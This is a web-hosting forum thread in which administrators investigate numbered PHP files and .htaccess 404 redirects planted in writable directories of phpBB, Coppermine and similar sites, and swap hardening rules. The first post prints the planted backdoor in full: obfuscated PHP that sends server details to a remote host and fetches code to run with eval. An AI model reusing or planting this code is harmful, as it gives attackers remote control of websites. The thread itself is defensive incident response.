Strange .htaccess files

nzkiwi

nzkiwi

Perch
I have a client who has installed phpBB, I assume from the CGI-Wizard in the Control Panel as most files have ownership of [username]:mblogistica instead of the more usual [username}:[username].

My concern is that there have appeared in directories with access permissions of 777 a .htaccess file and .php file that are dated about a month after phpBB was activated. Each php file has a different name, but consists of a series of digits - for example 223987,php. The .htaccess file refers to the php file. As both the .htaccess file and the php file have an ownership of httpd:httpd, I'm guessing the client is a hacking victim.

Example .htaccess file:
Code: 
<Files *>
	Order Allow,Deny
	Deny from All
</Files>
Options -MultiViews
ErrorDocument 404 //forums/cache/223987.php
The 223987.php file:
Code: 
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwc2VhcmNoLmNu");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="6d2beb2e8c4b32759e39c3e909cb6dbf") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
Can anyone shed any light on these files?
 
with 777 permissions, yes it look like a 404 error 'hijack' or something similar to me.
 
Ok, I've removed the offending files from all directories I can find with 777 permissions. To those directories which should be accessed only by scripts, I have added a new .htaccess file:
Code: 
Order Deny,Allow
Deny from all
To the other writable directories I have added this .htaccess file:
Code: 
<Files ~ "\.(php|php3|php4|php5|phtml|pl|cgi|shtm|shtml)$">                                                                              
  order deny,allow                                                                                                            
  deny from all                                                                                                               
</Files>
It's a pity that writable directories created by the phpBB install script weren't better protected at the outset.

Anything else I should do to keep the site safe?
 
I've seen an attack like this before on a server running a commercial shopping cart software - not sure if that's relevant, but the attacker had to gain access somehow.

It was accompanied by HTTP requests to non-existing files, like in your case 223987.php, which would run the script indicated by that 404 directive. The script, as you can tell, just builds a big string with system info and sends the whole thing back by another HTTP request to the compromised server that sent it.

Having said that, I have to admit I don't understand it. This is the info you would find if you ran a script with phpinfo() - I'm guessing they're just looking for some attack vectors to try in some automated attack?? One difference, when I saw this happening, there were many such files in many directories, not just one.
 
This particular site has SiteStudio and phpBB installed from the Control Panel. The the offending files were in every directory with 777 permissions. I've started looking through a few other customer sites and some of these also have the same problem. Every site affected runs a php script such as Coppermine Photo Gallery, osCommerce, MODx CMS etc. Wherever there is a web writable directory, the offending files appear X(
 
You might want to check your transfer statistics, storage statistics, and database statistics.

I received a couple notices of accounts nearing their resource limits - when I checked I found things like databases using 100+MBs and a couple of sites were reporting 30+MB of traffic per DAY. I've got one site that is at almost 10GB of used storage, and I still have not found what is taking up so much space!!

I've seen the same pattern too - all these problems are on sites with various PHP packages - in my case COPPERMINE, JOOMLA, DRUPAL, and GALLERY2.

I'm in the process of trying to track down what exactly is happening - but the stats pages only show 30MB of daily traffic and the most visited URL is /drupal/ or /gallery/....

BTW- I only received a warning message for one site/account - when I saw what was happening I started looking into other accounts and noticed the abnormal traffic/storage/mysql storage issues.
 
used space and used transfer/traffic are two different things, just be sure you don't get confused when looking, as logs won't have used storage, but will have use transfer.
 
@Stephen:
Just wondering if you have any advice when looking into things like this?

I'm just getting started investigatomg this, but it seems unusual...

For instance - one specific case was 12MB of traffic to /coppermine/main.php - the file main.php is only a few KB! On that same site, the database is FULL of bizarre entries like 'event: updated <em>dTQixoLtuwSvFIW</em>.' We're talking 100+MB databases with hundreds of thousands of entries like this.

I mentioned looking at both logs and storage since it seems like some of the sites with mysql database abuse don't seem to be triggering either storage or bandwidth alerts...

Crazy hackers....I'd love to know exactly why they are doing this and what it is!!
 
Bunchadogs said:
@Stephen:
Just wondering if you have any advice when looking into things like this?

I'm just getting started investigatomg this, but it seems unusual...

For instance - one specific case was 12MB of traffic to /coppermine/main.php - the file main.php is only a few KB! On that same site, the database is FULL of bizarre entries like 'event: updated <em>dTQixoLtuwSvFIW</em>.' We're talking 100+MB databases with hundreds of thousands of entries like this.

I mentioned looking at both logs and storage since it seems like some of the sites with mysql database abuse don't seem to be triggering either storage or bandwidth alerts...

Crazy hackers....I'd love to know exactly why they are doing this and what it is!!
Click to expand...

it isn't really hackers, it is compromised home/office PCs scanning networks first, they then get noted as possibly vulnerable versions and then get hacked/defaced by a person using a known exploit in most cases.
 
Yeah, 'hackers/ing' really isn't a good term for them/it...

I hate to bog you down with questions, but how serious is something like this?

I'm seeing a lot of activity in my databases (thousands and thousands of bizarre new records). But right now they are not affecting the actual website content.

For instance, on a Drupal site there was 66MB of data in the MySQL database that was all stuff inserted by 'hackers'. The site itself, and the content, was not touched.

I'm concerned because (1) I don't want to needlessley waste server resources and (2) I really don't want to give 'hackers' free access to my (your) servers for posting links to all kinds of crap. I imagine all that activity
 
Bunchadogs said:
Yeah, 'hackers/ing' really isn't a good term for them/it...

I hate to bog you down with questions, but how serious is something like this?

I'm seeing a lot of activity in my databases (thousands and thousands of bizarre new records). But right now they are not affecting the actual website content.

For instance, on a Drupal site there was 66MB of data in the MySQL database that was all stuff inserted by 'hackers'. The site itself, and the content, was not touched.

I'm concerned because (1) I don't want to needlessley waste server resources and (2) I really don't want to give 'hackers' free access to my (your) servers for posting links to all kinds of crap. I imagine all that activity
Click to expand...
sure I understand, most of this is probably coming from mods, extensions, etc allowing access to certain tables.

One big thing that causes abuse is actually that stupid guestbook script hsphere pre-installs.

One time I saw a server using 800MB of RAM in bursts, it was trying it use perl and open a 1GB guestbook txt file that was almost 100% spam links.

he client wasn't using it I just disabled it and compressed the file down to a few MB.
 
You must log in or register to reply here.
Back
Top